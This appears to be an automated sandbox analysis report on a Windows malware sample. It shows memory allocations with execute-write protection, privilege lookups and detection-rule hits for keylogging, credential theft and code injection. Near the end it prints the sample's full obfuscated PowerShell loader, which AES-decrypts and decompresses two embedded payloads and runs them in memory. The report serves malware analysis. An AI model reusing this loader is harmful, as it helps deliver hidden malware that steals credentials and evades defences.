stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -w hidden -c #
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate priviledges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Take ScreenShot rule ScreenShot
cmdline "C:\Users\test22\AppData\Local\Temp\cpp_self_SC.bat.exe" $hoqP='MaASJPinMASJPodASJPuASJPleASJP'.Replace('ASJP', '');$icJO='LoASJPadASJP'.Replace('ASJP', '');$PTNQ='EASJPnASJPtASJPrASJPyPoASJPinASJPtASJP'.Replace('ASJP', '');$qOyZ='SASJPpliASJPtASJP'.Replace('ASJP', '');$Pdxo='CASJPrASJPeaASJPtASJPeDASJPecASJPryptASJPorASJP'.Replace('ASJP', '');$TEkt='TranASJPsfoASJPrmASJPFinaASJPlBASJPloASJPckASJP'.Replace('ASJP', '');$xFRM='FroASJPmBaASJPse6ASJP4StASJPriASJPngASJP'.Replace('ASJP', '');$cDSQ='CASJPhASJPaASJPngASJPeASJPExteASJPnsiASJPonASJP'.Replace('ASJP', '');$hMFe='FirASJPstASJP'.Replace('ASJP', '');$dBAR='GetCASJPuASJPrreASJPntASJPProASJPceASJPssASJP'.Replace('ASJP', '');$Wijw='IASJPnvASJPokASJPeASJP'.Replace('ASJP', '');$FOKd='ReASJPadASJPLASJPinASJPesASJP'.Replace('ASJP', '');function IgypD($utrtk){$NjyUn=[System.Security.Cryptography.Aes]::Create();$NjyUn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NjyUn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NjyUn.Key=[System.Convert]::$xFRM('ObPQe07WRiYWEUTOpWDEw/EZfBcGQKT9ju4qCcGJuXE=');$NjyUn.IV=[System.Convert]::$xFRM('DgAS1sFB7YAK8VQ/Y81U7Q==');$nkxgc=$NjyUn.$Pdxo();$pgtXE=$nkxgc.$TEkt($utrtk,0,$utrtk.Length);$nkxgc.Dispose();$NjyUn.Dispose();$pgtXE;}function tEuKj($utrtk){$ClWPe=New-Object System.IO.MemoryStream(,$utrtk);$JHyon=New-Object System.IO.MemoryStream;$aZrPy=New-Object System.IO.Compression.GZipStream($ClWPe,[IO.Compression.CompressionMode]::Decompress);$aZrPy.CopyTo($JHyon);$aZrPy.Dispose();$ClWPe.Dispose();$JHyon.Dispose();$JHyon.ToArray();}$pLLSf=[System.Linq.Enumerable]::$hMFe([System.IO.File]::$FOKd([System.IO.Path]::$cDSQ([System.Diagnostics.Process]::$dBAR().$hoqP.FileName, $null)));$XQVFj=$pLLSf.Substring(3).$qOyZ(':');$VsmWT=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[0])));$YKzPU=tEuKj (IgypD ([Convert]::$xFRM($XQVFj[1])));[System.Reflection.Assembly]::$icJO([byte[]]$YKzPU).$PTNQ.$Wijw($null,$null);[System.Reflection.Assembly]::$icJO([byte[]]$VsmWT).$PTNQ.$Wijw($null,$null);
option -w hidden value Attempts to execute command with a hidden window